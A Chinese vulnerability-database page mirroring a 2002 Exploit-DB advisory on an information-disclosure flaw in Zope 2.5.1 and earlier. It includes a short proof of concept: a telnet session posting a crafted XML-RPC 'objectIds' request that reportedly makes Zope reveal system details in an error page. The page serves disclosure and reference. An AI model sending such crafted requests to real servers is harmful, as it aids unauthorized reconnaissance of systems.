Zope 2.x – Incorrect XML-RPC Request Information Disclosure

Zope 2.x – Incorrect XML-RPC Request Information Disclosure

漏洞ID 1053621 漏洞类型
发布时间 2002-09-26 更新时间 2002-09-26
图片[1]-Zope 2.x – Incorrect XML-RPC Request Information Disclosure-安全小百科CVE编号 N/A
图片[2]-Zope 2.x – Incorrect XML-RPC Request Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21870
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5806/info

A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details.

telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93

<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>

相关推荐: ARSC Really Simple Chat Path Disclosure Vulnerability

ARSC Really Simple Chat Path Disclosure Vulnerability 漏洞ID 1102346 漏洞类型 Input Validation Error 发布时间 2002-03-16 更新时间 2002-03-16 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享